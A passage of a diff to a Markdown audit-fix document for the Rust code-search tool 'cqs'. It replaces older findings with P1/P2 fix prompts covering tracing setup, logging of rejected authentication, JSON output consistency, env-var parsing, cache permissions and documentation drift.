+    // line in the journal automatically. Without it, only events emitted
+    // *inside* a span produce log lines; entry/exit pairs disappear.
+    tracing_subscriber::fmt()
+        .with_env_filter(filter)
+        .with_span_events(tracing_subscriber::fmt::format::FmtSpan::CLOSE)
+        .with_writer(std::io::stderr)
+        .init();
 
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --lib diff`.
-
----
-
-### AC-V1.29-2: `is_structural_query` misses EOL keyword
-
-**File**: `/mnt/c/Projects/cqs/src/search/router.rs`
-
-**Current code** (lines 787-789):
-```rust
-STRUCTURAL_KEYWORDS
-    .iter()
-    .any(|kw| query.contains(&format!(" {} ", kw)) || query.starts_with(&format!("{} ", kw)))
-```
-
-**Fix**:
-
-Add the end-of-string variant so `"find all trait"` matches. The current probe requires the keyword to be followed by a trailing space.
-
-```rust
-STRUCTURAL_KEYWORDS.iter().any(|kw| {
-    query.contains(&format!(" {kw} "))
-        || query.starts_with(&format!("{kw} "))
-        || query.ends_with(&format!(" {kw}"))
-        || query == *kw
-})
-```
-
-Add a unit test in `router::tests` that asserts `is_structural_query("find all trait") == true` and `is_structural_query("find all traits") == true`.
-
-**Why**: `"find all trait"` and similar trailing-keyword queries misroute to Conceptual α=0.70 instead of Structural α=0.90 — measurable R@1 drop on structural eval.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --lib search::router`.
-
----
-
-### AC-V1.29-3: `bfs_expand` HashMap seed order
-
-**File**: `/mnt/c/Projects/cqs/src/gather.rs`
-
-**Current code** (lines 317-320):
-```rust
-let mut queue: VecDeque<(Arc<str>, usize)> = VecDeque::new();
-for name in name_scores.keys() {
-    queue.push_back((Arc::from(name.as_str()), 0));
+    cli::run_with(cli)
 }
 ```
 
-**Fix**:
+### Notes
 
-Sort seeds before enqueuing so BFS expansion is order-independent of `HashMap` iteration seed:
+- Verify the codebase's actual crate name in Cargo.toml — `cqs` is what `lib.rs` declares per `MEMORY.md`.
+- Side effect: every `cqs <command>` now prints span boundaries to stderr at default level. May surprise existing users who pipe stdout but watch stderr. Mention in CHANGELOG: "default log level raised to `cqs=info,warn` so span instrumentation renders by default; set `RUST_LOG=warn` to silence."
+- Companion finding P1.21 (auth failures log nothing) and P2.25 (per-request span disconnected from spawn_blocking) become valuable only after this lands.
+- Stretch (out of scope): `--log-format=json` flag wired to `.json()` builder for daemon journals. Tracking-issue.
+
+---
+
+## P1.21 — Auth failures log nothing — no journal trail for 401s
+
+**Finding:** P1.21 in audit-triage.md / Observability OB-V1.30-2
+**Files:** `src/serve/auth.rs:194-232` (specifically the `AuthOutcome::Unauthorized` arm at lines 224-230)
+**Why:** Auth middleware returns 401 silently. Brute-force scans, expired bookmarks, misconfigured clients leave no journal trail. Asymmetric with `enforce_host_allowlist` (`src/serve/mod.rs:246`) which DOES emit `tracing::warn!` on rejection.
+
+### Current code (src/serve/auth.rs:224-230)
 
 ```rust
-// AC-V1.29-3: HashMap iteration order is process-seed-dependent.
-// Sort seeds by (score desc, name asc) before enqueue so results are
-// deterministic when the cap hits mid-expansion.
-let mut seeds: Vec<(&str, f32)> = name_scores
+        AuthOutcome::Unauthorized => {
+            // Body intentionally minimal: no debug data, no token-
+            // length leak. Tracing happens once per launch (banner)
+            // and never per-request — auditors can grep for the
+            // count of 401s in access logs without seeing tokens.
+            (StatusCode::UNAUTHORIZED, "Unauthorized").into_response()
+        }
+```
+
+### Replacement
+
+```rust
+        AuthOutcome::Unauthorized => {
+            // Body intentionally minimal: no debug data, no token-
+            // length leak. Tracing emits method + path (NOT query
+            // string — that may carry `?token=` candidates) so
+            // operators get a journal trail for 401s without
+            // logging token material.
+            tracing::warn!(
+                method = %req.method(),
+                path = %req.uri().path(),
+                "serve: rejected unauthenticated request",
+            );
+            (StatusCode::UNAUTHORIZED, "Unauthorized").into_response()
+        }
+```
+
+### Notes
+
+- Critical: log `path` only, NOT `uri()` — the URI carries `?token=…` for the OkViaQueryParam case but the same shape can appear on Unauthorized (bad token still has the param). `req.uri().path()` strips the query string.
+- Companion to P1.11 (TraceLayer also leaks query string). Both must be fixed together; otherwise the OB-V1.30-1 default-level fix (P1.20) makes the leak more visible, not less.
+- Add a regression test `test_unauthorized_logs_method_and_path_no_query` in `src/serve/auth.rs::tests` that wraps the test subscriber and asserts `?token=...` is absent from captured events.
+
+---
+# P2 Fix Prompts — Part A (P2.1 through P2.46)
+
+Source: `docs/audit-triage.md` (P2 table) and `docs/audit-findings.md`. Each prompt
+is self-contained; line numbers verified against the working tree on 2026-04-26.
+
+> **Already-fixed callout:** P2.43 (`semantic_diff` tie-break), P2.44 (`is_structural_query` words check), P2.45 (`bfs_expand` seed sort), P2.46 (`contrastive_neighbors` tie-break) all already carry tie-break / words-loop fixes in the working tree. The prompts below for those four are **regression-pin tests only** — the implementation fix is already on disk.
+
+---
+
+## P2.1 — `cmd_similar` JSON parity drop
+
+**Finding:** P2.1 in audit-triage.md
+**Files:** `src/cli/batch/handlers/info.rs:139-148`
+**Why:** Batch path emits 3 fields; CLI emits the canonical 9-field SearchResult shape via `r.to_json()`. Agents see a different schema for `cqs similar` depending on whether the daemon is up.
+
+### Current code
+
+```rust
+let json_results: Vec<serde_json::Value> = filtered
     .iter()
-    .map(|(k, (s, _))| (k.as_str(), *s))
+    .map(|r| {
+        serde_json::json!({
+            "name": r.chunk.name,
+            "file": normalize_path(&r.chunk.file),
+            "score": r.score,
+        })
+    })
     .collect();
-seeds.sort_by(|(a_name, a_score), (b_name, b_score)| {
-    b_score
-        .partial_cmp(a_score)
-        .unwrap_or(std::cmp::Ordering::Equal)
-        .then_with(|| a_name.cmp(b_name))
-});
-
-let mut queue: VecDeque<(Arc<str>, usize)> = VecDeque::new();
-for (name, _) in seeds {
-    queue.push_back((Arc::from(name), 0));
-}
 ```
 
-**Why**: When `name_scores.len() >= max_expanded_nodes` hits mid-expansion, which neighbors get enqueued before the cap fires depends on iteration order. Non-determinism is the bug; the cap itself is fine.
+### Replacement
 
-**Verify**: `cargo build --features gpu-index`. Add a deterministic-seed test in `gather::tests`: seed 10 names, cap at 15, run twice, assert byte-identical `name_scores` output.
+```rust
+let json_results: Vec<serde_json::Value> =
+    filtered.iter().map(|r| r.to_json()).collect();
+```
+
+### Notes
+
+- `to_json()` is on `cqs::store::SearchResult` at `src/store/helpers/types.rs:143-156` and already normalizes the file path via the canonical helper.
+- Add a snapshot test asserting CLI and batch produce identical key sets for the same query.
 
 ---
 
-### AC-V1.29-5: `--name-boost` accepts out-of-range
+## P2.2 — `dispatch_diff` dead `target_store` placeholder
 
-**File**: `/mnt/c/Projects/cqs/src/cli/args.rs`
+**Finding:** P2.2 in audit-triage.md
+**Files:** `src/cli/batch/handlers/misc.rs:354-387`
+**Why:** Dead-variable initialization plus duplicate `if target_label == "project"` match. The `get_ref` cached store at line 360 is loaded then discarded; the else branch reopens via `resolve_reference_store` at 378.
 
-**Current code** (lines 57-58):
-```rust
-/// Weight for name matching in hybrid search (0.0-1.0)
-#[arg(long, default_value = "0.2", value_parser = parse_finite_f32)]
-pub name_boost: f32,
-```
-
-**Fix**:
-
-Add a range-bounded parser. Introduce `parse_unit_f32` in `src/cli/definitions.rs`:
+### Current code
 
 ```rust
-// In src/cli/definitions.rs, sibling of parse_finite_f32:
-pub(crate) fn parse_unit_f32(s: &str) -> Result<f32, String> {
-    let v = parse_finite_f32(s)?;
-    if !(0.0..=1.0).contains(&v) {
-        return Err(format!("value must be in [0.0, 1.0], got {v}"));
-    }
-    Ok(v)
-}
-```
-
-Then in args.rs:
-```rust
-/// Weight for name matching in hybrid search (0.0-1.0)
-#[arg(long, default_value = "0.2", value_parser = crate::cli::definitions::parse_unit_f32)]
-pub name_boost: f32,
-```
-
-Also apply to `--weight` in ref add (`src/cli/commands/infra/reference.rs:50`, currently uses `parse_finite_f32` with an after-the-fact range check inside `cmd_ref_add`; centralize the check).
-
-**Why**: `--name-boost 1.5` silently works, subtracts > 1.0 from embedding weight — search degrades with no warning. Same class as SEC-V1.25-8 bounded-parser wave.
-
-**Verify**: `cargo build --features gpu-index`. Add test: `cqs search --name-boost 1.5 foo` must return a clap exit code (not silent success).
-
----
-
-### AC-V1.29-6: `reranker::compute_scores_opt` unchecked multiply
-
-**File**: `/mnt/c/Projects/cqs/src/reranker.rs`
-
-**Current code** (lines 368-387):
-```rust
-let stride = if shape.len() == 2 {
-    shape[1] as usize
+let target_label = target.unwrap_or("project");
+let target_store = if target_label == "project" {
+    &ctx.store()
 } else {
-    1
+    ctx.get_ref(target_label)?;
+    &ctx.store() // placeholder -- replaced below
 };
-if stride == 0 {
-    return Err(RerankerError::Inference(
-        "Model returned zero-width output tensor".to_string(),
-    ));
+
+// For non-project targets, resolve properly
+let result = if target_label == "project" {
+    cqs::semantic_diff(&source_store, target_store, source, target_label, threshold, lang)?
+} else {
+    let target_ref_store =
+        crate::cli::commands::resolve::resolve_reference_store(&ctx.root, target_label)?;
+    cqs::semantic_diff(&source_store, &target_ref_store, source, target_label, threshold, lang)?
+};
+```
+
+### Replacement
+
+```rust
+let target_label = target.unwrap_or("project");
+let result = if target_label == "project" {
+    cqs::semantic_diff(
+        &source_store,
+        &ctx.store(),
+        source,
+        target_label,
+        threshold,
+        lang,
+    )?
+} else {
+    let target_ref_store =
+        crate::cli::commands::resolve::resolve_reference_store(&ctx.root, target_label)?;
+    cqs::semantic_diff(
+        &source_store,
+        &target_ref_store,
+        source,
+        target_label,
+        threshold,
+        lang,
+    )?
+};
+```
+
+### Notes
+
+- Drop the `ctx.get_ref(target_label)?` line entirely — it cached a store the code never reads. `resolve_reference_store` owns the lifetime here.
+- One `if target_label == "project"` block, no placeholder, no duplicate match.
+
+---
+
+## P2.3 — Embedding/Query cache `open_with_runtime` 90+ line copy-paste
+
+**Finding:** P2.3 in audit-triage.md
+**Files:** `src/cache.rs:103-220` (`EmbeddingCache::open_with_runtime`), `src/cache.rs:1412-1522` (`QueryCache::open_with_runtime`)
+**Why:** Two methods do parent-dir prep, runtime fallback, pool open, schema create, and 0o600 chmod loop in identical order with only `busy_timeout` differing. ~90 duplicated lines.
+
+### Current code (sketch — both methods share this skeleton)
+
+```rust
+pub fn open_with_runtime(path: &Path, runtime: Option<Arc<Runtime>>) -> Result<Self, CacheError> {
+    let _span = tracing::info_span!("EmbeddingCache::open", path = %path.display()).entered();
+    if let Some(parent) = path.parent() {
+        std::fs::create_dir_all(parent)?;
+        #[cfg(unix)] {
+            // 16 lines: chmod 0o700 best-effort with warn block
+        }
+    }
+    let rt = if let Some(rt) = runtime { rt } else {
+        // 9 lines: current_thread runtime fallback
+    };
+    let opts = SqliteConnectOptions::new().filename(path).create_if_missing(true)
+        .busy_timeout(Duration::from_millis(5000))  // QueryCache: 2000
+        .journal_mode(SqliteJournalMode::Wal);
+    let pool = rt.block_on(SqlitePoolOptions::new().max_connections(1)
+        .idle_timeout(Duration::from_secs(30)).connect_with(opts))?;
+    rt.block_on(sqlx::query(SCHEMA_SQL).execute(&pool))?;
+    #[cfg(unix)] {
+        // 22 lines: 0o600 chmod loop on ["", "-wal", "-shm"]
+    }
+    // ... build Self
 }
-let expected_len = batch_size * stride;
-if data.len() < expected_len {
-    return Err(RerankerError::Inference(format!(
-        "Model output too short: expected {} elements, got {}",
-        expected_len,
-        data.len()
+```
+
+### Replacement
+
+Extract three private helpers into a sibling module (e.g. `src/cache/open.rs` or inline at top of `cache.rs`):
+
+```rust
+#[cfg(unix)]
+pub(super) fn prepare_cache_dir_perms(parent: &Path) {
+    use std::os::unix::fs::PermissionsExt;
+    if let Ok(meta) = std::fs::metadata(parent) {
+        let mut perms = meta.permissions();
+        if perms.mode() & 0o777 != 0o700 {
+            perms.set_mode(0o700);
+            if let Err(e) = std::fs::set_permissions(parent, perms) {
+                tracing::warn!(parent = %parent.display(), error = %e, "best-effort chmod 0o700 on cache dir failed");
+            }
+        }
+    }
+}
+
+#[cfg(unix)]
+pub(super) fn apply_db_file_perms(path: &Path) {
+    use std::os::unix::fs::PermissionsExt;
+    for suffix in ["", "-wal", "-shm"] {
+        let p = path.with_extension(format!("{}{}", path.extension().and_then(|s| s.to_str()).unwrap_or(""), suffix));
+        if let Ok(meta) = std::fs::metadata(&p) {
+            let mut perms = meta.permissions();
+            if perms.mode() & 0o777 != 0o600 {
+                perms.set_mode(0o600);
+                let _ = std::fs::set_permissions(&p, perms);
+            }
+        }
+    }
+}
+
+pub(super) fn connect_cache_pool(
+    path: &Path,
+    busy_ms: u64,
+    runtime: Option<Arc<Runtime>>,
+    schema_sql: &str,
+) -> Result<(SqlitePool, Arc<Runtime>), CacheError> {
+    let rt = runtime.unwrap_or_else(|| {
+        Arc::new(Builder::new_current_thread().enable_all().build()
+            .expect("cache: failed to build current_thread runtime"))
+    });
+    let opts = SqliteConnectOptions::new().filename(path).create_if_missing(true)
+        .busy_timeout(Duration::from_millis(busy_ms))
+        .journal_mode(SqliteJournalMode::Wal);
+    let pool = rt.block_on(async {
+        let p = SqlitePoolOptions::new().max_connections(1)
+            .idle_timeout(Duration::from_secs(30)).connect_with(opts).await?;
+        sqlx::query(schema_sql).execute(&p).await?;
+        Ok::<_, sqlx::Error>(p)
+    })?;
+    Ok((pool, rt))
+}
+```
+
+Both `open_with_runtime` methods collapse to ~30 lines each, calling these three helpers.
+
+### Notes
+
+- Keep `Drop` impl panic-extraction unified via P2.4's helper too.
+- Watch for the WAL/SHM filename quirk: SQLite tags them as `<basename>-wal`, not via `with_extension`. The existing code uses string concat (`path.to_string_lossy() + "-wal"`); preserve that semantic in `apply_db_file_perms`.
+
+---
+
+## P2.4 — `env::var(...).parse()` pattern at 25+ sites
+
+**Finding:** P2.4 in audit-triage.md
+**Files:** `src/limits.rs:230-260` (private helpers); duplicated at `src/cli/watch.rs:65,74,100,498,510,766,942,1430`, `src/llm/mod.rs:176,315,406,434`, `src/cli/pipeline/types.rs:80,98,117,144`, `src/hnsw/persist.rs:19,41,63`, `src/embedder/models.rs:565,571`, `src/embedder/mod.rs:330`, `src/cache.rs:206,1509`, `src/gather.rs:156`, `src/cli/commands/graph/trace.rs:357`, `src/impact/bfs.rs:16`, `src/reranker.rs:129`
+**Why:** `parse_env_f32 / parse_env_usize / parse_env_u64` exist in `limits.rs` but are `pub(crate)`-private to `cqs::limits`. Every other module re-rolls the pattern with slightly different zero-handling and warn behavior. P2.5 (cache zero-divergence) is a direct consequence.
+
+### Replacement plan
+
+1. Promote the three helpers in `src/limits.rs` to `pub`, and add a `parse_env_duration_secs` variant. Keep the existing `pub(crate)` re-exports so internal callers don't break.
+2. Replace the 25+ open-coded sites with calls. Example for `src/cli/pipeline/types.rs:143`:
+
+```rust
+// Before
+match std::env::var("CQS_EMBED_BATCH_SIZE") {
+    Ok(val) => match val.parse::<usize>() { Ok(s) if s > 0 => s, _ => 64 },
+    Err(_) => 64,
+}
+// After
+cqs::limits::parse_env_usize("CQS_EMBED_BATCH_SIZE", 64).max(1)
+```
+
+### Notes
+
+- Decide zero-handling **once** in the helper signature (e.g. `parse_env_usize_nonzero`); P2.5 is a known divergence to fold into the same PR.
+- Don't change observable behavior in this PR — match the existing default at every call site even where the new helper would be cleaner. Behavior changes ride on a follow-up.
+
+---
+
+## P2.5 — `EmbeddingCache` accepts `CQS_CACHE_MAX_SIZE=0`; `QueryCache` rejects
+
+**Finding:** P2.5 in audit-triage.md
+**Files:** `src/cache.rs:206-209` (Embedding, no zero filter), `src/cache.rs:1509-1513` (Query, `.filter(|&n: &u64| n > 0)`)
+
+### Current code
+
+```rust
+// EmbeddingCache (line 206-209)
+let max_size_bytes = std::env::var("CQS_CACHE_MAX_SIZE")
+    .ok()
+    .and_then(|s| s.parse().ok())
+    .unwrap_or(10 * 1024 * 1024 * 1024); // 10GB default
+
+// QueryCache (line 1509-1513)
+let max_size_bytes = std::env::var("CQS_QUERY_CACHE_MAX_SIZE")
+    .ok()
+    .and_then(|s| s.parse().ok())
+    .filter(|&n: &u64| n > 0)
+    .unwrap_or(100 * 1024 * 1024);
+```
+
+### Replacement
+
+Pick semantic: "0 is invalid → fall back to default". Add the filter to `EmbeddingCache`:
+
+```rust
+let max_size_bytes = std::env::var("CQS_CACHE_MAX_SIZE")
+    .ok()
+    .and_then(|s| s.parse().ok())
+    .filter(|&n: &u64| n > 0)
+    .unwrap_or(10 * 1024 * 1024 * 1024);
+```
+
+### Notes
+
+- Folds naturally into the P2.4 helper sweep — drive both through `parse_env_u64_nonzero` once that helper lands.
+- Document chosen semantic at the env-var site.
+
+---
+
+## P2.6 / P2.7 / P2.9 / P2.10 — README documentation drift (combined)
+
+**Finding:** P2.6, P2.7, P2.9, P2.10 in audit-triage.md
+**Files:** `README.md:5,467-525,521,530-585,649-653`
+**Why:** TL;DR claims "544-query eval" (actual 218); claims 54 languages but Elm missing from list; Claude Code Integration block omits 5 commands and lists `stats/prune/compact` instead of `stats/clear/prune/compact`.
+
+### Current code (README.md:5)
+
+```markdown
+**TL;DR:** Code intelligence toolkit for Claude Code. ... 17-41x token reduction vs full file reads. **42.2% R@1 / 67.0% R@5 / 83.5% R@20 on a 544-query dual-judge eval against the cqs codebase itself** (BGE-large dense + SPLADE sparse with per-category fusion + centroid query routing). 54 languages + L5X/L5K PLC exports, GPU-accelerated.
+```
+
+### Replacement (TL;DR — P2.6, P2.7)
+
+```markdown
+**TL;DR:** Code intelligence toolkit for Claude Code. ... 17-41x token reduction vs full file reads. **42.2% R@1 / 67.0% R@5 / 83.5% R@20 on a 218-query dual-judge eval (109 test + 109 dev, v3.v2 fixture) against the cqs codebase itself** (BGE-large dense + SPLADE sparse with per-category fusion + centroid query routing). 54 languages + L5X/L5K PLC exports, GPU-accelerated.
+```
+
+Plus add an `Elm` bullet to the alphabetical list under `## Supported Languages (54)` between `Dockerfile` and `Erlang` (or wherever alphabetically).
+
+### Replacement (Claude Code Integration — P2.9, P2.10)
+
+In `README.md:521`:
+
+```markdown
+- `cqs cache stats/clear/prune/compact` - manage the project-scoped embeddings cache at `<project>/.cqs/embeddings_cache.db`. `--per-model` on stats; `clear --model <fp>` deletes all cached embeddings for one fingerprint; `prune <DAYS>` or `prune --model <id>`; `compact` runs VACUUM
+```
+
+Add five new bullets in the alphabetically-correct positions inside the Code Intelligence block (lines 467-525):
+
+```markdown
+- `cqs ping` - daemon healthcheck; reports daemon socket path and uptime if running
+- `cqs eval <fixture>` - run a query fixture against the current index and emit R@K metrics. `--baseline <path>` to compare two reports
+- `cqs model show/list/swap` - inspect the embedding model recorded in the index, list presets, or swap with restore-on-failure semantics
+- `cqs serve [--bind ADDR]` - launch the read-only web UI (graph, hierarchy, cluster, chunk-detail). Per-launch auth token; banner prints the URL
+- `cqs refresh` - invalidate daemon caches and re-open the Store. Alias `cqs invalidate`. No-op when no daemon is running
+```
+
+### Notes
+
+- Eval metrics: optionally also bump to refreshed v3.v2 numbers (`63.3% R@5 test, 74.3% R@5 dev`) per memory file `feedback_eval_line_start_drift.md`. Keep both numbers consistent if updating.
+- Verify language count by walking `define_languages!` macro in `src/language/mod.rs` — fix the README header to match instead of guessing.
+
+---
+
+## P2.8 — SECURITY.md omits per-project embeddings_cache.db
+
+**Finding:** P2.8 in audit-triage.md
+**Files:** `SECURITY.md:65-82` (Read Access table)
+
+### Current code
+
+```markdown
+| `~/.cache/cqs/embeddings.db` | Global embedding cache (content-addressed, capped at 1 GB) | Index and search |
+| `~/.cache/cqs/query_cache.db` | Recent query embedding cache (7-day TTL) | Search |
+```
+
+### Replacement
+
+Add row to both Read Access (line 65-82) and Write Access (line 83-95) tables:
+
+```markdown
+| `<project>/.cqs/embeddings_cache.db` | Per-project embedding cache (PR #1105, primary; legacy global cache at `~/.cache/cqs/embeddings.db` is fallback) | `cqs index`, search |
+```
+
+Also fix the misleading "7-day TTL" claim — see P1.2 (PRIVACY.md fix); keep SECURITY consistent: `Recent query embedding cache (size-capped at CQS_QUERY_CACHE_MAX_SIZE, 100 MiB default)`.
+
+### Notes
+
+- Cross-check against PRIVACY.md so wording matches; the same per-project path is documented correctly there at lines 16-20.
+
+---
+
+## P2.11 — `cqs --json model swap/show` emits plain-text errors
+
+**Finding:** P2.11 in audit-triage.md
+**Files:** `src/cli/commands/infra/model.rs:144-149` (`cmd_model_show` bail), `src/cli/commands/infra/model.rs:256-261` (`cmd_model_swap` Unknown preset), `src/cli/commands/infra/model.rs:267-272` (`cmd_model_swap` no-index bail)
+
+### Current code
+
+```rust
+// cmd_model_show, line 144-149
+if !index_path.exists() {
+    bail!(
+        "No index at {}. Run `cqs init && cqs index` first.",
+        index_path.display()
+    );
+}
+
+// cmd_model_swap, line 256-272
+let new_cfg = ModelConfig::from_preset(preset).ok_or_else(|| {
+    let valid = ModelConfig::PRESET_NAMES.join(", ");
+    anyhow::anyhow!(
+        "Unknown preset '{preset}'. Valid presets: {valid}. Run `cqs model list` for repos."
+    )
+})?;
+
+if !index_path.exists() {
+    bail!(
+        "No index at {}. Run `cqs init && cqs index --model {preset}` first.",
+        index_path.display()
+    );
+}
+```
+
+### Replacement
+
+Route through `crate::cli::json_envelope::emit_json_error` when `json` is true:
+
+```rust
+// cmd_model_show
+if !index_path.exists() {
+    let msg = format!("No index at {}. Run `cqs init && cqs index` first.", index_path.display());
+    if json {
+        crate::cli::json_envelope::emit_json_error("no_index", &msg)?;
+        std::process::exit(1);
+    }
+    bail!("{msg}");
+}
+
+// cmd_model_swap — Unknown preset
+let new_cfg = match ModelConfig::from_preset(preset) {
+    Some(c) => c,
+    None => {
+        let valid = ModelConfig::PRESET_NAMES.join(", ");
+        let msg = format!("Unknown preset '{preset}'. Valid presets: {valid}. Run `cqs model list` for repos.");
+        if json {
+            crate::cli::json_envelope::emit_json_error("unknown_preset", &msg)?;
+            std::process::exit(1);
+        }
+        bail!("{msg}");
+    }
+};
+
+// cmd_model_swap — no index (mirror cmd_model_show fix)
+```
+
+Also add `already_on_target` code for the no-op short-circuit and `swap_failed` for the post-rebuild restore path.
+
+### Notes
+
+- Pattern matches `cmd_ref_remove` in `src/cli/commands/infra/reference.rs` which the v1.30.0 audit already standardized.
+- Tests: snapshot a `cqs --json model swap nonexistent` against the canonical envelope shape `{data: null, error: {code, message}, version: 1}`.
+
+---
+
+## P2.12 — `cqs init / index / convert` lack `--json`
+
+**Finding:** P2.12 in audit-triage.md
+**Files:** `src/cli/commands/infra/init.rs:13` (`cmd_init`), `src/cli/commands/index/build.rs::cmd_index`, `src/cli/commands/index/convert.rs::cmd_convert`, `src/cli/args.rs::IndexArgs`, `src/cli/args.rs` (no `InitArgs` / `ConvertArgs` struct yet)
+
+### Replacement
+
+1. Add `pub json: bool` to `IndexArgs`, introduce `InitArgs { #[arg(long)] pub json: bool }`, add `pub json: bool` to `ConvertArgs`.
+2. Thread `cli.json || args.json` into `cmd_init` / `cmd_index` / `cmd_convert`.
+3. After work completes, emit a final summary envelope:
+
+```rust
+// cmd_init
+if json {
+    let obj = serde_json::json!({
+        "initialized": true,
+        "cqs_dir": cqs_dir.display().to_string(),
+        "model": effective_model_name,
+    });
+    crate::cli::json_envelope::emit_json(&obj)?;
+}
+
+// cmd_index
+if json {
+    let obj = serde_json::json!({
+        "indexed_files": file_count,
+        "indexed_chunks": chunk_count,
+        "took_ms": elapsed.as_millis(),
+        "model": model_name,
+        "summaries_added": summaries_added,
+        "docs_improved": docs_improved,
+    });
+    crate::cli::json_envelope::emit_json(&obj)?;
+}
+
+// cmd_convert
+if json {
+    let obj = serde_json::json!({
+        "converted": converted_paths,
+        "skipped": skipped_paths,
+        "took_ms": elapsed.as_millis(),
+    });
+    crate::cli::json_envelope::emit_json(&obj)?;
+}
+```
+
+4. Suppress per-step progress prints when `json` is true (route to stderr or gate on `!json`).
+
+### Notes
+
+- `cmd_doctor` already has a `Colored human-readable check progress is routed to stderr in this mode` pattern — reuse it.
+- These three commands already emit useful progress; do not regress that for the text path.
+
+---
+
+## P2.13 — Global `--slot` silently ignored by `slot` and `cache` subcommands
+
+**Finding:** P2.13 in audit-triage.md
+**Files:** `src/cli/definitions.rs` (`pub slot: Option<String>` is `global = true`); consumers: `src/cli/commands/infra/slot.rs` (`SlotCommand::*`), `src/cli/commands/infra/cache_cmd.rs::resolve_cache_path`
+
+### Replacement
+
+Two acceptable shapes — pick at PR time:
+
+**Option A (recommended):** Move `--slot` off `global = true` and onto only the subcommands that consume it. Apply via `#[command(flatten)]` of a `SlotArg { #[arg(long)] pub slot: Option<String> }` to: `Search`, `Index`, `Doctor`, `ModelSwap`, etc. Drop from `Slot*`/`Cache*`.
+
+**Option B:** Keep global but enforce at dispatch:
+
+```rust
+// In dispatch routing for Slot* / Cache* arms:
+if cli.slot.is_some() {
+    bail!("--slot has no effect on `cqs {subcommand}` (this command is project-scoped, not slot-scoped)");
+}
+```
+
+### Notes
+
+- Cache is project-scoped per #1105, not per-slot — that contract is the source of the bug. Don't accidentally make it slot-scoped without an explicit design decision.
+- Bonus cleanup: `cqs slot create foo --slot bar` is parsed as "create slot foo" today; option A makes the misuse a clap error.
+
+---
+
+## P2.14 — `cqs refresh` has no `--json`
+
+**Finding:** P2.14 in audit-triage.md
+**Files:** `src/cli/definitions.rs:759-760` (`Commands::Refresh` — variant has no fields); `src/cli/registry.rs` Refresh dispatch arm; daemon-side `dispatch_refresh` handler
+
+### Current code
+
+```rust
+#[command(visible_alias = "invalidate")]
+Refresh,
+```
+
+### Replacement
+
+```rust
+#[command(visible_alias = "invalidate")]
+Refresh {
+    #[arg(long)]
+    json: bool,
+},
+```
+
+In the dispatch arm, when `json` is set emit:
+
+```rust
+let obj = serde_json::json!({
+    "refreshed": true,
+    "daemon_running": daemon_was_running,
+    "caches_invalidated": ["embedder_session", "query_cache_lru", "notes"],
+});
+crate::cli::json_envelope::emit_json(&obj)?;
+```
+
+### Notes
+
+- `cli.json || args.json` precedence so the global flag still works.
+- Update the registry `for_each_command!` row if pattern-matching on field shape.
+
+---
+
+## P2.15 — List-shape JSON envelopes inconsistent across `*list` commands
+
+**Finding:** P2.15 in audit-triage.md
+**Files:** `src/cli/commands/infra/reference.rs::cmd_ref_list` (raw array), `src/cli/commands/infra/model.rs::cmd_model_list` (raw array), `src/cli/commands/infra/project.rs:124-140` (object), `src/cli/commands/infra/slot.rs::slot_list` (object), `src/cli/commands/io/notes.rs::cmd_notes_list` (object), `src/cli/commands/search/query.rs` (object)
+
+### Replacement
+
+Standardize on `{"data": {"<plural>": [...], <optional summary fields>}}`:
+
+```rust
+// cmd_ref_list — change from raw Vec<RefSummary> to:
+let obj = serde_json::json!({ "references": refs });
+crate::cli::json_envelope::emit_json(&obj)?;
+
+// cmd_model_list — change from raw Vec<ModelInfo> to:
+let obj = serde_json::json!({
+    "models": models,
+    "current": current_name, // fold the per-row `current: bool` into a top-level field
+});
+crate::cli::json_envelope::emit_json(&obj)?;
+```
+
+### Notes
+
+- One PR touches both call sites + their tests. No external users — hard rename is fine per project memory.
+- After the rename, `data.{slots,projects,refs,models,notes}` is a uniform accessor.
+
+---
+
+## P2.16 — `cache stats` mixes bytes and MB; `cache compact` uses bytes only
+
+**Finding:** P2.16 in audit-triage.md
+**Files:** `src/cli/commands/infra/cache_cmd.rs::cache_stats` (around line 145-149, emits both `total_size_bytes` AND `total_size_mb`), `cache_compact` (bytes only)
+
+### Current code (cache_stats JSON branch)
+
+```rust
+let obj = serde_json::json!({
+    "cache_path": cache_path.display().to_string(),
+    "total_entries": stats.total_entries,
+    "total_size_bytes": stats.total_size_bytes,
+    "total_size_mb": stats.total_size_bytes as f64 / 1_048_576.0,
+    // ...
+});
+```
+
+### Replacement
+
+```rust
+let obj = serde_json::json!({
+    "cache_path": cache_path.display().to_string(),
+    "total_entries": stats.total_entries,
+    "total_size_bytes": stats.total_size_bytes,
+    // total_size_mb dropped — bytes is the canonical unit
+    // ...
+});
+```
+
+Keep the `total_size_mb` rendering only on the human text path (`format!("{:.1} MB", ...)`).
+
+### Notes
+
+- Repository-wide grep for consumers of `total_size_mb` before dropping. None expected (no external users).
+
+---
+
+## P2.17 — `dispatch::try_daemon_query` warns then silently re-runs in CLI
+
+**Finding:** P2.17 in audit-triage.md
+**Files:** `src/cli/dispatch.rs:445-462`
+**Why:** EH-13 comment claims "no silent fallback" but the function returns `None` to fall through to CLI anyway. Daemon-only features can produce different results between the warning print and the CLI re-run.
+
+### Current code
+
+```rust
+// EH-13: daemon understood the request but surfaced an error. ... Falling
+// back to CLI now would mask daemon bugs ...
+let msg = resp.get("message").and_then(|v| v.as_str()).unwrap_or("daemon error");
+tracing::warn!(error = msg, "Daemon returned protocol-level error");
+eprintln!("cqs: daemon error: {msg}");
+eprintln!("hint: set CQS_NO_DAEMON=1 to run the command directly in the CLI (bypasses the daemon).");
+// Still return None so we fall through to CLI path, but the user has been
+// told why — no silent fallback.
+None
+```
+
+### Replacement
+
+Change the return type so the protocol-error case bubbles up instead of falling through:
+
+```rust
+// File header: change signature
+fn try_daemon_query(...) -> Result<Option<String>, anyhow::Error> { ... }
+
+// At the EH-13 branch:
+let msg = resp.get("message").and_then(|v| v.as_str()).unwrap_or("daemon error");
+tracing::warn!(error = msg, "Daemon returned protocol-level error");
+return Err(anyhow::anyhow!(
+    "daemon error: {msg}\nhint: set CQS_NO_DAEMON=1 to bypass the daemon"
+));
+```
+
+Caller at `:200` switches from `match try_daemon_query(...) { Some(s) => ..., None => fall_through_to_cli() }` to handling the new `Result<Option<String>>`:
+
+```rust
+match try_daemon_query(...)? {
+    Some(text) => emit(text),
+    None => fall_through_to_cli(),
+}
+```
+
+### Notes
+
+- Exits non-zero with the daemon's message — matches the comment's stated intent.
+- All existing transport-error paths (connect/read/write fail) still return `Ok(None)` so CLI fallback works for those.
+
+---
+
